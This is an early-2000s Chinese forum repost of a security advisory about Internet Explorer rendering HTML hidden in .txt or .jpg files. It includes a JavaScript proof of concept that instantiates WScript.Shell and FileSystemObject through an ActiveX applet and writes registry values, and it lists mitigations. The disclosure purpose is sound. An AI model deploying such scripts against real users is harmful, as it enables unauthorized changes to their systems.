发信人: williamlong(蓝色月光) 
整理人: starseacn(2001-09-06 11:22:28), 站内信件
 | 
 
 
IE 检查扩展名漏洞 (APP,缺陷) 
   
 涉及程序: 
 HTML 
   
 描述: 
 利用IE不检查含HTML语句的文件扩展名能欺骗用户访问病毒页面 
   
 详细: 
 近日发现 IE 存在安全漏洞,它对含有 HTML 语句的文本不检查扩展名。在 NOTEPAD 上写一份 HTML 文件,保存为 .txt。上传至空间服务器,用 IE 访问 URL。发现,IE 把 .txt 误读成 .html.
 
 将扩展名 .txt 改成 .jpg 或者别的非下载类文件。IE 都无法辨认文件类型。
 
 入侵者利用此漏洞,是有能力在 .txt.jpg.png.... 这些被认为是十分安全的页面上做到 html 上所能做的攻击行为。甚至查看信件的用户都不能保证安全。
 
 
 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
 
 
 
 
 以下是攻击测试代码:
 <SCRIPT Language="JavaScript" type="text/javascript">
 <!--
 
 document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
 
 function f(){
 try
 {
 //ActiveX initialization
 a1=document.applets[0];
 a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
 a1.createInstance();
 Shl = a1.GetObject();
 a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
 a1.createInstance();
 FSO = a1.GetObject();
 a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
 a1.createInstance();
 Net = a1.GetObject();
 
 try
 {
 if (document.cookie.indexOf("Chg") == -1)
 {
 
 
 Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good 
 
 day to die!");
 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good 
 
 day to die!");
 var expdate = new Date((new Date()).getTime() + (1));
 document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
 
 }
 }
 catch(e)
 {}
 }
 catch(e)
 {}
 }
 function init()
 {
 setTimeout("f()", 1000);
 }
 init();
 
 // -->
 </SCRIPT> 
 
  
 
 
 受影响系统:
 IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft outlook 
 
 Express,tencent explorer
 
 不受影响系统:
 netscape
 
 from : [email protected] 
   
 解决方案: 
 1)下载杀毒软件!已有的及时更新病毒库。将系统里比较危险的一些程序改名,比如format.com、deltree.exe等
 2)邮件附件不要双击直接打开,存到文件夹后,用杀毒程序扫一遍。
 3)及时更新系统补丁。 
   
  | 
 
 
 |